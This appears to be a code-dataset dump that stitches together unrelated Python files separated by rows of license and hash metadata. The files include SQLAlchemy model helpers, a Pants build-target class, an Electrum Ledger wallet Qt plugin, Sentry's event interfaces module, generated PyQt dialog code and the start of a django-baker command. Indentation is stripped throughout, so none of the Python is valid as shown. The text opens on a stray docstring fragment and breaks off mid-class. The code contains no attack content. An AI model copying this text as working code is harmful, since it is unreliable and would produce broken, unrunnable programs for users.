def serialize(self):
return {'id': self.id,
'name': self.name,
'data type': self.data_type,
'optional': self.optional}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, value):
self._data_type = value
@hybrid_property
def optional(self):
return self._optional
@optional.setter
def optional(self, value):
self._optional = value
"""
class URL(db.Model):
# Fields
id = db.Column(db.Integer, primary_key=True)
_url = db.Column(db.String(124), index=False, unique=False)
# Relationships
data_set_id = db.Column(db.Integer, db.ForeignKey('data_set.id'))
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
def __init__(self, url, data_set_id=None, implementation_id=None):
self._url = url
self.data_set_id = data_set_id
self.implementation_id = implementation_id
@hybrid_property
def url(self):
return self._url
@url.setter
def url(self, value):
self._url = value
# Universal Functions
def makedir(dirname):
""" Creates a directory if it doesn't already exist """
if not os.path.isdir(dirname):
os.makedirs(dirname)
return dirname
def make_zipfile(output_filename, source_dir):
"""http://stackoverflow.com/questions/1855095/"""
relroot = os.path.abspath(os.path.join(source_dir, os.pardir))
with zipfile.ZipFile(output_filename, "w",
zipfile.ZIP_DEFLATED, True) as zip:
for root, dirs, files in os.walk(source_dir):
# add directory (needed for empty dirs)
zip.write(root, os.path.relpath(root, relroot))
for file in files:
filename = os.path.join(root, file)
os.chmod(filename, 0755)
if os.path.isfile(filename): # regular files only
arcname = os.path.join(os.path.relpath(root, relroot), file)
zip.write(filename, arcname)
|
bsd-3-clause
| -587,099,930,290,131,300
| 28.360393
| 80
| 0.599824
| false
| 3.965422
| false
| false
| false
|
digwanderlust/pants
|
src/python/pants/base/target_addressable.py
|
1
|
2168
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from six import string_types
from pants.base.addressable import Addressable
from pants.base.deprecated import deprecated
from pants.base.exceptions import TargetDefinitionException
class TargetAddressable(Addressable):
@classmethod
def get_target_type(cls):
raise NotImplemented
def __init__(self, *args, **kwargs):
self.target_type = self.get_target_type()
if 'name' not in kwargs:
raise Addressable.AddressableInitError(
'name is a required parameter to all Targets specified within a BUILD file.'
' Target type was: {target_type}.'
.format(target_type=self.target_type))
if args:
raise Addressable.AddressableInitError(
'All arguments passed to Targets within BUILD files must use explicit keyword syntax.'
' Target type was: {target_type}.'
' Arguments passed were: {args}'
.format(target_type=self.target_type, args=args))
self.kwargs = kwargs
self.name = kwargs['name']
self.dependency_specs = self.kwargs.pop('dependencies', [])
for dep_spec in self.dependency_specs:
if not isinstance(dep_spec, string_types):
msg = ('dependencies passed to Target constructors must be strings. {dep_spec} is not'
' a string. Target type was: {target_type}.'
.format(target_type=self.target_type, dep_spec=dep_spec))
raise TargetDefinitionException(target=self, msg=msg)
@property
def addressable_name(self):
return self.name
def __str__(self):
format_str = 'TargetAddressable(target_type={target_type}, name={name}, **kwargs=...)'
return format_str.format(target_type=self.target_type, name=self.name)
def __repr__(self):
format_str = 'TargetAddressable(target_type={target_type}, kwargs={kwargs})'
return format_str.format(target_type=self.target_type, kwargs=self.kwargs)
|
apache-2.0
| 9,125,159,257,805,332,000
| 37.035088
| 95
| 0.690959
| false
| 3.89228
| false
| false
| false
|
cryptapus/electrum-myr
|
plugins/ledger/qt.py
|
1
|
2181
|
import threading
from PyQt4.Qt import (QDialog, QInputDialog, QLineEdit,
QVBoxLayout, QLabel, SIGNAL)
import PyQt4.QtCore as QtCore
from electrum.i18n import _
from .ledger import LedgerPlugin
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from electrum_gui.qt.util import *
from btchip.btchipPersoWizard import StartBTChipPersoDialog
class Plugin(LedgerPlugin, QtPluginBase):
icon_unpaired = ":icons/ledger_unpaired.png"
icon_paired = ":icons/ledger.png"
def create_handler(self, window):
return Ledger_Handler(window)
class Ledger_Handler(QtHandlerBase):
setup_signal = pyqtSignal()
auth_signal = pyqtSignal(object)
def __init__(self, win):
super(Ledger_Handler, self).__init__(win, 'Ledger')
self.setup_signal.connect(self.setup_dialog)
self.auth_signal.connect(self.auth_dialog)
def word_dialog(self, msg):
response = QInputDialog.getText(self.top_level_window(), "Ledger Wallet Authentication", msg, QLineEdit.Password)
if not response[1]:
self.word = None
else:
self.word = str(response[0])
self.done.set()
def message_dialog(self, msg):
self.clear_dialog()
self.dialog = dialog = WindowModalDialog(self.top_level_window(), _("Ledger Status"))
l = QLabel(msg)
vbox = QVBoxLayout(dialog)
vbox.addWidget(l)
dialog.show()
def auth_dialog(self, data):
try:
from .auth2fa import LedgerAuthDialog
except ImportError as e:
self.message_dialog(e)
return
dialog = LedgerAuthDialog(self, data)
dialog.exec_()
self.word = dialog.pin
self.done.set()
def get_auth(self, data):
self.done.clear()
self.auth_signal.emit(data)
self.done.wait()
return self.word
def get_setup(self):
self.done.clear()
self.setup_signal.emit()
self.done.wait()
return
def setup_dialog(self):
dialog = StartBTChipPersoDialog()
dialog.exec_()
|
mit
| 870,677,349,423,049,600
| 27.324675
| 121
| 0.607519
| false
| 3.740995
| false
| false
| false
|
beni55/sentry
|
src/sentry/interfaces.py
|
1
|
35445
|
"""
sentry.interfaces
~~~~~~~~~~~~~~~~~
Interfaces provide an abstraction for how structured data should be
validated and rendered.
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import itertools
import urlparse
import warnings
from pygments import highlight
# from pygments.lexers import get_lexer_for_filename, TextLexer, ClassNotFound
from pygments.lexers import TextLexer
from pygments.formatters import HtmlFormatter
from django.http import QueryDict
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from sentry.app import env
from sentry.models import UserOption
from sentry.utils.strings import strip
from sentry.web.helpers import render_to_string
_Exception = Exception
def unserialize(klass, data):
value = object.__new__(klass)
value.__setstate__(data)
return value
def is_url(filename):
return filename.startswith(('http:', 'https:', 'file:'))
def get_context(lineno, context_line, pre_context=None, post_context=None, filename=None,
format=False):
lineno = int(lineno)
context = []
start_lineno = lineno - len(pre_context or [])
if pre_context:
start_lineno = lineno - len(pre_context)
at_lineno = start_lineno
for line in pre_context:
context.append((at_lineno, line))
at_lineno += 1
else:
start_lineno = lineno
at_lineno = lineno
if start_lineno < 0:
start_lineno = 0
context.append((at_lineno, context_line))
at_lineno += 1
if post_context:
for line in post_context:
context.append((at_lineno, line))
at_lineno += 1
# HACK:
if filename and is_url(filename) and '.' not in filename.rsplit('/', 1)[-1]:
filename = 'index.html'
if format:
# try:
# lexer = get_lexer_for_filename(filename)
# except ClassNotFound:
# lexer = TextLexer()
lexer = TextLexer()
formatter = HtmlFormatter()
def format(line):
if not line:
return mark_safe('<pre></pre>')
return mark_safe(highlight(line, lexer, formatter))
context = tuple((n, format(l)) for n, l in context)
return context
def is_newest_frame_first(event):
newest_first = event.platform not in ('python', None)
if env.request and env.request.user.is_authenticated():
display = UserOption.objects.get_value(
user=env.request.user,
project=None,
key='stacktrace_order',
default=None,
)
if display == '1':
newest_first = False
elif display == '2':
newest_first = True
return newest_first
class Interface(object):
"""
An interface is a structured representation of data, which may
render differently than the default ``extra`` metadata in an event.
"""
score = 0
display_score = None
def __init__(self, **kwargs):
self.attrs = kwargs.keys()
self.__dict__.update(kwargs)
def __eq__(self, other):
if type(self) != type(other):
return False
return self.serialize() == other.serialize()
def __setstate__(self, data):
kwargs = self.unserialize(data)
self.attrs = kwargs.keys()
self.__dict__.update(kwargs)
def __getstate__(self):
return self.serialize()
def validate(self):
pass
def unserialize(self, data):
return data
def serialize(self):
return dict((k, self.__dict__[k]) for k in self.attrs)
def get_composite_hash(self, interfaces):
return self.get_hash()
def get_hash(self):
return []
def to_html(self, event, is_public=False, **kwargs):
return ''
def to_string(self, event, is_public=False, **kwargs):
return ''
def get_slug(self):
return type(self).__name__.lower()
def get_title(self):
return _(type(self).__name__)
def get_display_score(self):
return self.display_score or self.score
def get_score(self):
return self.score
def get_search_context(self, event):
"""
Returns a dictionary describing the data that should be indexed
by the search engine. Several fields are accepted:
- text: a list of text items to index as part of the generic query
- filters: a map of fields which are used for precise matching
"""
return {
# 'text': ['...'],
# 'filters': {
# 'field": ['...'],
# },
}
class Message(Interface):
"""
A standard message consisting of a ``message`` arg, and an optional
``params`` arg for formatting.
If your message cannot be parameterized, then the message interface
will serve no benefit.
- ``message`` must be no more than 1000 characters in length.
>>> {
>>> "message": "My raw message with interpreted strings like %s",
>>> "params": ["this"]
>>> }
"""
attrs = ('message', 'params')
def __init__(self, message, params=(), **kwargs):
self.message = message
self.params = params
def validate(self):
assert len(self.message) <= 5000
def serialize(self):
return {
'message': self.message,
'params': self.params,
}
def get_hash(self):
return [self.message]
def get_search_context(self, event):
if isinstance(self.params, (list, tuple)):
params = list(self.params)
elif isinstance(self.params, dict):
params = self.params.values()
else:
params = []
return {
'text': [self.message] + params,
}
class Query(Interface):
"""
A SQL query with an optional string describing the SQL driver, ``engine``.
>>> {
>>> "query": "SELECT 1"
>>> "engine": "psycopg2"
>>> }
"""
attrs = ('query', 'engine')
def __init__(self, query, engine=None, **kwargs):
self.query = query
self.engine = engine
def get_hash(self):
return [self.query]
def serialize(self):
return {
'query': self.query,
'engine': self.engine,
}
def get_search_context(self, event):
return {
'text': [self.query],
}
class Frame(object):
attrs = ('abs_path', 'filename', 'lineno', 'colno', 'in_app', 'context_line',
'pre_context', 'post_context', 'vars', 'module', 'function', 'data')
def __init__(self, abs_path=None, filename=None, lineno=None, colno=None,
in_app=None, context_line=None, pre_context=(),
post_context=(), vars=None, module=None, function=None,
data=None, **kwargs):
self.abs_path = abs_path or filename
self.filename = filename or abs_path
if self.is_url():
urlparts = urlparse.urlparse(self.abs_path)
if urlparts.path:
self.filename = urlparts.path
self.module = module
self.function = function
if lineno is not None:
self.lineno = int(lineno)
else:
self.lineno = None
if colno is not None:
self.colno = int(colno)
else:
self.colno = None
self.in_app = in_app
self.context_line = context_line
self.pre_context = pre_context
self.post_context = post_context
self.vars = vars or {}
self.data = data or {}
def __getitem__(self, key):
warnings.warn('Frame[key] is deprecated. Use Frame.key instead.', DeprecationWarning)
return getattr(self, key)
def is_url(self):
if not self.abs_path:
return False
return is_url(self.abs_path)
def is_valid(self):
if self.in_app not in (False, True, None):
return False
if type(self.vars) != dict:
return False
if type(self.data) != dict:
return False
return self.filename or self.function or self.module
def get_hash(self):
output = []
if self.module:
output.append(self.module)
elif self.filename and not self.is_url():
output.append(self.filename)
if self.context_line is not None:
output.append(self.context_line)
elif not output:
# If we were unable to achieve any context at this point
# (likely due to a bad JavaScript error) we should just
# bail on recording this frame
return output
elif self.function:
output.append(self.function)
elif self.lineno is not None:
output.append(self.lineno)
return output
def get_context(self, event, is_public=False, **kwargs):
if (self.context_line and self.lineno is not None
and (self.pre_context or self.post_context)):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename or self.module,
format=True,
)
start_lineno = context[0][0]
else:
context = []
start_lineno = None
frame_data = {
'abs_path': self.abs_path,
'filename': self.filename,
'module': self.module,
'function': self.function,
'start_lineno': start_lineno,
'lineno': self.lineno,
'context': context,
'context_line': self.context_line,
'in_app': self.in_app,
'is_url': self.is_url(),
}
if not is_public:
frame_data['vars'] = self.vars or {}
if event.platform == 'javascript' and self.data:
frame_data.update({
'sourcemap': self.data['sourcemap'].rsplit('/', 1)[-1],
'sourcemap_url': urlparse.urljoin(self.abs_path, self.data['sourcemap']),
'orig_function': self.data['orig_function'],
'orig_filename': self.data['orig_filename'],
'orig_lineno': self.data['orig_lineno'],
'orig_colno': self.data['orig_colno'],
})
return frame_data
def to_string(self, event):
if event.platform is not None:
choices = [event.platform]
else:
choices = []
choices.append('default')
templates = [
'sentry/partial/frames/%s.txt' % choice
for choice in choices
]
return render_to_string(templates, {
'abs_path': self.abs_path,
'filename': self.filename,
'function': self.function,
'module': self.module,
'lineno': self.lineno,
'colno': self.colno,
'context_line': self.context_line,
}).strip('\n')
class Stacktrace(Interface):
"""
A stacktrace contains a list of frames, each with various bits (most optional)
describing the context of that frame. Frames should be sorted from oldest
to newest.
The stacktrace contains one element, ``frames``, which is a list of hashes. Each
hash must contain **at least** the ``filename`` attribute. The rest of the values
are optional, but recommended.
The list of frames should be ordered by the oldest call first.
Each frame must contain the following attributes:
``filename``
The relative filepath to the call
OR
``function``
The name of the function being called
OR
``module``
Platform-specific module path (e.g. sentry.interfaces.Stacktrace)
The following additional attributes are supported:
``lineno``
The line number of the call
``colno``
The column number of the call
``abs_path``
The absolute path to filename
``context_line``
Source code in filename at lineno
``pre_context``
A list of source code lines before context_line (in order) -- usually [lineno - 5:lineno]
``post_context``
A list of source code lines after context_line (in order) -- usually [lineno + 1:lineno + 5]
``in_app``
Signifies whether this frame is related to the execution of the relevant code in this stacktrace. For example,
the frames that might power the framework's webserver of your app are probably not relevant, however calls to
the framework's library once you start handling code likely are.
``vars``
A mapping of variables which were available within this frame (usually context-locals).
>>> {
>>> "frames": [{
>>> "abs_path": "/real/file/name.py"
>>> "filename": "file/name.py",
>>> "function": "myfunction",
>>> "vars": {
>>> "key": "value"
>>> },
>>> "pre_context": [
>>> "line1",
>>> "line2"
>>> ],
>>> "context_line": "line3",
>>> "lineno": 3,
>>> "in_app": true,
>>> "post_context": [
>>> "line4",
>>> "line5"
>>> ],
>>> }]
>>> }
.. note:: This interface can be passed as the 'stacktrace' key in addition
to the full interface path.
"""
attrs = ('frames',)
score = 1000
def __init__(self, frames, **kwargs):
self.frames = [Frame(**f) for f in frames]
def __iter__(self):
return iter(self.frames)
def validate(self):
for frame in self.frames:
# ensure we've got the correct required values
assert frame.is_valid()
def serialize(self):
frames = []
for f in self.frames:
# compatibility with old serialization
if isinstance(f, Frame):
frames.append(vars(f))
else:
frames.append(f)
return {
'frames': frames,
}
def has_app_frames(self):
return any(f.in_app is not None for f in self.frames)
def unserialize(self, data):
data['frames'] = [Frame(**f) for f in data.pop('frames', [])]
return data
def get_composite_hash(self, interfaces):
output = self.get_hash()
if 'sentry.interfaces.Exception' in interfaces:
exc = interfaces['sentry.interfaces.Exception'][0]
if exc.type:
output.append(exc.type)
elif not output:
output = exc.get_hash()
return output
def get_hash(self):
output = []
for frame in self.frames:
output.extend(frame.get_hash())
return output
def get_context(self, event, is_public=False, newest_first=None,
with_stacktrace=True, **kwargs):
system_frames = 0
frames = []
for frame in self.frames:
frames.append(frame.get_context(event=event, is_public=is_public))
if not frame.in_app:
system_frames += 1
if len(frames) == system_frames:
system_frames = 0
# if theres no system frames, pretend they're all part of the app
if not system_frames:
for frame in frames:
frame['in_app'] = True
if newest_first is None:
newest_first = is_newest_frame_first(event)
if newest_first:
frames = frames[::-1]
context = {
'is_public': is_public,
'newest_first': newest_first,
'system_frames': system_frames,
'event': event,
'frames': frames,
'stack_id': 'stacktrace_1',
}
if with_stacktrace:
context['stacktrace'] = self.get_traceback(event, newest_first=newest_first)
return context
def to_html(self, event, **kwargs):
context = self.get_context(
event=event,
**kwargs
)
return render_to_string('sentry/partial/interfaces/stacktrace.html', context)
def to_string(self, event, is_public=False, **kwargs):
return self.get_stacktrace(event, system_frames=False, max_frames=5)
def get_stacktrace(self, event, system_frames=True, newest_first=None, max_frames=None):
if newest_first is None:
newest_first = is_newest_frame_first(event)
result = []
if newest_first:
result.append(_('Stacktrace (most recent call first):'))
else:
result.append(_('Stacktrace (most recent call last):'))
result.append('')
frames = self.frames
num_frames = len(frames)
if not system_frames:
frames = [f for f in frames if f.in_app is not False]
if not frames:
frames = self.frames
if newest_first:
frames = frames[::-1]
if max_frames:
visible_frames = max_frames
if newest_first:
start, stop = None, max_frames
else:
start, stop = -max_frames, None
else:
visible_frames = len(frames)
start, stop = None, None
if not newest_first and visible_frames < num_frames:
result.extend(('(%d additional frame(s) were not displayed)' % (num_frames - visible_frames,), '...'))
for frame in frames[start:stop]:
result.append(frame.to_string(event))
if newest_first and visible_frames < num_frames:
result.extend(('...', '(%d additional frame(s) were not displayed)' % (num_frames - visible_frames,)))
return '\n'.join(result)
def get_traceback(self, event, newest_first=None):
result = [
event.message, '',
self.get_stacktrace(event, newest_first=newest_first),
]
return '\n'.join(result)
def get_search_context(self, event):
return {
'text': list(itertools.chain(*[[f.filename, f.function, f.context_line] for f in self.frames])),
}
class SingleException(Interface):
"""
A standard exception with a mandatory ``value`` argument, and optional
``type`` and``module`` argument describing the exception class type and
module namespace.
You can also optionally bind a stacktrace interface to an exception. The
spec is identical to ``sentry.interfaces.Stacktrace``.
>>> {
>>> "type": "ValueError",
>>> "value": "My exception value",
>>> "module": "__builtins__"
>>> "stacktrace": {
>>> # see sentry.interfaces.Stacktrace
>>> }
>>> }
"""
attrs = ('value', 'type', 'module', 'stacktrace')
score = 900
display_score = 1200
def __init__(self, value, type=None, module=None, stacktrace=None, **kwargs):
# A human readable value for the exception
self.value = value
# The exception type name (e.g. TypeError)
self.type = type
# Optional module of the exception type (e.g. __builtin__)
self.module = module
# Optional bound stacktrace interface
if stacktrace:
self.stacktrace = Stacktrace(**stacktrace)
else:
self.stacktrace = None
def validate(self):
if self.stacktrace:
return self.stacktrace.validate()
def serialize(self):
if self.stacktrace:
stacktrace = self.stacktrace.serialize()
else:
stacktrace = None
return {
'type': strip(self.type) or None,
'value': strip(self.value) or None,
'module': strip(self.module) or None,
'stacktrace': stacktrace,
}
def unserialize(self, data):
if data.get('stacktrace'):
data['stacktrace'] = unserialize(Stacktrace, data['stacktrace'])
else:
data['stacktrace'] = None
return data
def get_hash(self):
output = None
if self.stacktrace:
output = self.stacktrace.get_hash()
if output and self.type:
output.append(self.type)
if not output:
output = filter(bool, [self.type, self.value])
return output
def get_context(self, event, is_public=False, **kwargs):
last_frame = None
interface = event.interfaces.get('sentry.interfaces.Stacktrace')
if interface is not None and interface.frames:
last_frame = interface.frames[-1]
e_module = strip(self.module)
e_type = strip(self.type) or 'Exception'
e_value = strip(self.value)
if self.module:
fullname = '%s.%s' % (e_module, e_type)
else:
fullname = e_type
return {
'is_public': is_public,
'event': event,
'exception_value': e_value or e_type or '<empty value>',
'exception_type': e_type,
'exception_module': e_module,
'fullname': fullname,
'last_frame': last_frame
}
def get_search_context(self, event):
return {
'text': [self.value, self.type, self.module]
}
class Exception(Interface):
"""
An exception consists of a list of values. In most cases, this list
contains a single exception, with an optional stacktrace interface.
Each exception has a mandatory ``value`` argument and optional ``type`` and
``module`` arguments describing the exception class type and module
namespace.
You can also optionally bind a stacktrace interface to an exception. The
spec is identical to ``sentry.interfaces.Stacktrace``.
>>> [{
>>> "type": "ValueError",
>>> "value": "My exception value",
>>> "module": "__builtins__"
>>> "stacktrace": {
>>> # see sentry.interfaces.Stacktrace
>>> }
>>> }]
Values should be sent oldest to newest, this includes both the stacktrace
and the exception itself.
.. note:: This interface can be passed as the 'exception' key in addition
to the full interface path.
"""
attrs = ('values',)
score = 2000
def __init__(self, *args, **kwargs):
if 'values' in kwargs:
values = kwargs['values']
elif not kwargs and len(args) == 1 and isinstance(args[0], (list, tuple)):
values = args[0]
else:
values = [kwargs]
self.values = [SingleException(**e) for e in values]
def __getitem__(self, key):
return self.values[key]
def __iter__(self):
return iter(self.values)
def __len__(self):
return len(self.values)
def validate(self):
for exception in self.values:
# ensure we've got the correct required values
exception.validate()
def serialize(self):
return {
'values': [e.serialize() for e in self.values]
}
def unserialize(self, data):
if 'values' not in data:
data = {'values': [data]}
data['values'] = [unserialize(SingleException, v) for v in data['values']]
return data
def get_hash(self):
return self.values[0].get_hash()
def get_composite_hash(self, interfaces):
return self.values[0].get_composite_hash(interfaces)
def get_context(self, event, is_public=False, **kwargs):
newest_first = is_newest_frame_first(event)
context_kwargs = {
'event': event,
'is_public': is_public,
'newest_first': newest_first,
}
exceptions = []
last = len(self.values) - 1
for num, e in enumerate(self.values):
context = e.get_context(**context_kwargs)
if e.stacktrace:
context['stacktrace'] = e.stacktrace.get_context(
with_stacktrace=False, **context_kwargs)
else:
context['stacktrace'] = {}
context['stack_id'] = 'exception_%d' % (num,)
context['is_root'] = num == last
exceptions.append(context)
if newest_first:
exceptions.reverse()
return {
'newest_first': newest_first,
'system_frames': sum(e['stacktrace'].get('system_frames', 0) for e in exceptions),
'exceptions': exceptions,
'stacktrace': self.get_stacktrace(event, newest_first=newest_first)
}
def to_html(self, event, **kwargs):
if not self.values:
return ''
if len(self.values) == 1 and not self.values[0].stacktrace:
exception = self.values[0]
context = exception.get_context(event=event, **kwargs)
return render_to_string('sentry/partial/interfaces/exception.html', context)
context = self.get_context(event=event, **kwargs)
return render_to_string('sentry/partial/interfaces/chained_exception.html', context)
def to_string(self, event, is_public=False, **kwargs):
return self.get_stacktrace(event, system_frames=False, max_frames=5)
def get_search_context(self, event):
return self.values[0].get_search_context(event)
def get_stacktrace(self, *args, **kwargs):
exc = self.values[0]
if exc.stacktrace:
return exc.stacktrace.get_stacktrace(*args, **kwargs)
return ''
class Http(Interface):
"""
The Request information is stored in the Http interface. Two arguments
are required: ``url`` and ``method``.
The ``env`` variable is a compounded dictionary of HTTP headers as well
as environment information passed from the webserver. Sentry will explicitly
look for ``REMOTE_ADDR`` in ``env`` for things which require an IP address.
The ``data`` variable should only contain the request body (not the query
string). It can either be a dictionary (for standard HTTP requests) or a
raw request body.
>>> {
>>> "url": "http://absolute.uri/foo",
>>> "method": "POST",
>>> "data": {
>>> "foo": "bar"
>>> },
>>> "query_string": "hello=world",
>>> "cookies": "foo=bar",
>>> "headers": {
>>> "Content-Type": "text/html"
>>> },
>>> "env": {
>>> "REMOTE_ADDR": "192.168.0.1"
>>> }
>>> }
.. note:: This interface can be passed as the 'request' key in addition
to the full interface path.
"""
attrs = ('url', 'method', 'data', 'query_string', 'cookies', 'headers',
'env')
display_score = 1000
score = 800
# methods as defined by http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html + PATCH
METHODS = ('GET', 'POST', 'PUT', 'OPTIONS', 'HEAD', 'DELETE', 'TRACE', 'CONNECT', 'PATCH')
def __init__(self, url, method=None, data=None, query_string=None, cookies=None, headers=None, env=None, **kwargs):
if data is None:
data = {}
if method:
method = method.upper()
urlparts = urlparse.urlsplit(url)
if not query_string:
# define querystring from url
query_string = urlparts.query
elif query_string.startswith('?'):
# remove '?' prefix
query_string = query_string[1:]
self.url = '%s://%s%s' % (urlparts.scheme, urlparts.netloc, urlparts.path)
self.method = method
self.data = data
self.query_string = query_string
if cookies:
self.cookies = cookies
else:
self.cookies = {}
# if cookies were a string, convert to a dict
# parse_qsl will parse both acceptable formats:
# a=b&c=d
# and
# a=b; c=d
if isinstance(self.cookies, basestring):
self.cookies = dict(urlparse.parse_qsl(self.cookies, keep_blank_values=True))
# if cookies were [also] included in headers we
# strip them out
if headers and 'Cookie' in headers:
cookies = headers.pop('Cookie')
if cookies:
self.cookies = cookies
self.headers = headers or {}
self.env = env or {}
def serialize(self):
return {
'url': self.url,
'method': self.method,
'data': self.data,
'query_string': self.query_string,
'cookies': self.cookies,
'headers': self.headers,
'env': self.env,
}
def to_string(self, event, is_public=False, **kwargs):
return render_to_string('sentry/partial/interfaces/http.txt', {
'event': event,
'full_url': '?'.join(filter(bool, [self.url, self.query_string])),
'url': self.url,
'method': self.method,
'query_string': self.query_string,
})
def _to_dict(self, value):
if value is None:
value = {}
if isinstance(value, dict):
return True, value
try:
value = QueryDict(value)
except _Exception:
return False, value
else:
return True, value
def to_html(self, event, is_public=False, **kwargs):
data = self.data
headers_is_dict, headers = self._to_dict(self.headers)
# educated guess as to whether the body is normal POST data
if headers_is_dict and headers.get('Content-Type') == 'application/x-www-form-urlencoded' and '=' in data:
_, data = self._to_dict(data)
context = {
'is_public': is_public,
'event': event,
'full_url': '?'.join(filter(bool, [self.url, self.query_string])),
'url': self.url,
'method': self.method,
'data': data,
'query_string': self.query_string,
'headers': self.headers,
}
if not is_public:
# It's kind of silly we store this twice
_, cookies = self._to_dict(self.cookies)
context.update({
'cookies': cookies,
'env': self.env,
})
return render_to_string('sentry/partial/interfaces/http.html', context)
def get_title(self):
return _('Request')
def get_search_context(self, event):
return {
'filters': {
'url': [self.url],
}
}
class Template(Interface):
"""
A rendered template (generally used like a single frame in a stacktrace).
The attributes ``filename``, ``context_line``, and ``lineno`` are required.
>>> {
>>> "abs_path": "/real/file/name.html"
>>> "filename": "file/name.html",
>>> "pre_context": [
>>> "line1",
>>> "line2"
>>> ],
>>> "context_line": "line3",
>>> "lineno": 3,
>>> "post_context": [
>>> "line4",
>>> "line5"
>>> ],
>>> }
.. note:: This interface can be passed as the 'template' key in addition
to the full interface path.
"""
attrs = ('filename', 'context_line', 'lineno', 'pre_context', 'post_context',
'abs_path')
score = 1100
def __init__(self, filename, context_line, lineno, pre_context=None, post_context=None,
abs_path=None, **kwargs):
self.abs_path = abs_path
self.filename = filename
self.context_line = context_line
self.lineno = int(lineno)
self.pre_context = pre_context
self.post_context = post_context
def serialize(self):
return {
'abs_path': self.abs_path,
'filename': self.filename,
'context_line': self.context_line,
'lineno': self.lineno,
'pre_context': self.pre_context,
'post_context': self.post_context,
}
def get_hash(self):
return [self.filename, self.context_line]
def to_string(self, event, is_public=False, **kwargs):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename,
format=False,
)
result = [
'Stacktrace (most recent call last):', '',
self.get_traceback(event, context)
]
return '\n'.join(result)
def to_html(self, event, is_public=False, **kwargs):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename,
format=True,
)
return render_to_string('sentry/partial/interfaces/template.html', {
'event': event,
'abs_path': self.abs_path,
'filename': self.filename,
'lineno': int(self.lineno),
'start_lineno': context[0][0],
'context': context,
'template': self.get_traceback(event, context),
'is_public': is_public,
})
def get_traceback(self, event, context):
result = [
event.message, '',
'File "%s", line %s' % (self.filename, self.lineno), '',
]
result.extend([n[1].strip('\n') for n in context])
return '\n'.join(result)
def get_search_context(self, event):
return {
'text': [self.abs_path, self.filename, self.context_line],
}
class User(Interface):
"""
An interface which describes the authenticated User for a request.
All data is arbitrary and optional other than the ``id``
field which should be a string representing the user's unique identifier.
>>> {
>>> "id": "unique_id",
>>> "username": "my_user",
>>> "email": "foo@example.com"
>>> }
"""
attrs = ('id', 'email', 'username', 'data')
def __init__(self, id=None, email=None, username=None, **kwargs):
self.id = id
self.email = email
self.username = username
self.data = kwargs
def serialize(self):
# XXX: legacy -- delete
if hasattr(self, 'is_authenticated'):
self.data['is_authenticated'] = self.is_authenticated
return {
'id': self.id,
'username': self.username,
'email': self.email,
'data': self.data,
}
def get_hash(self):
return []
def to_html(self, event, is_public=False, **kwargs):
if is_public:
return ''
return render_to_string('sentry/partial/interfaces/user.html', {
'is_public': is_public,
'event': event,
'user_id': self.id,
'user_username': self.username,
'user_email': self.email,
'user_data': self.data,
})
def get_search_context(self, event):
tokens = filter(bool, [self.id, self.username, self.email])
if not tokens:
return {}
return {
'text': tokens
}
|
bsd-3-clause
| 8,498,770,027,748,643,000
| 29.424893
| 119
| 0.551136
| false
| 4.132082
| false
| false
| false
|
xcgspring/XSTAF
|
XSTAF/ui/ui_confirmDialog.py
|
1
|
2148
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'confirmDialog.ui'
#
# Created: Fri Jun 05 09:54:07 2015
# by: PyQt4 UI code generator 4.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_confirmDialog(object):
def setupUi(self, confirmDialog):
confirmDialog.setObjectName(_fromUtf8("confirmDialog"))
confirmDialog.resize(398, 60)
self.gridLayout = QtGui.QGridLayout(confirmDialog)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.noButton = QtGui.QPushButton(confirmDialog)
self.noButton.setObjectName(_fromUtf8("noButton"))
self.gridLayout.addWidget(self.noButton, 1, 2, 1, 1)
self.yesButton = QtGui.QPushButton(confirmDialog)
self.yesButton.setObjectName(_fromUtf8("yesButton"))
self.gridLayout.addWidget(self.yesButton, 1, 1, 1, 1)
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 1, 0, 1, 1)
self.messageLabel = QtGui.QLabel(confirmDialog)
self.messageLabel.setObjectName(_fromUtf8("messageLabel"))
self.gridLayout.addWidget(self.messageLabel, 0, 0, 1, 3)
self.retranslateUi(confirmDialog)
QtCore.QMetaObject.connectSlotsByName(confirmDialog)
def retranslateUi(self, confirmDialog):
confirmDialog.setWindowTitle(_translate("confirmDialog", "Dialog", None))
self.noButton.setText(_translate("confirmDialog", "No", None))
self.yesButton.setText(_translate("confirmDialog", "Yes", None))
self.messageLabel.setText(_translate("confirmDialog", "TextLabel", None))
|
apache-2.0
| -5,367,792,330,494,818,000
| 40.307692
| 102
| 0.705773
| false
| 3.905455
| false
| false
| false
|
deannariddlespur/django-baker
|
django_baker/management/commands/bake.py
|
1
|
2636
|
from __future__ import print_function
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ImproperlyConfigured
from django.db.models import get_app, get_models
from django.db.models.loading import get_model
from ...bakery import Baker
class Command(BaseCommand):
args = "appname:modelname,modelname2,modelname3"
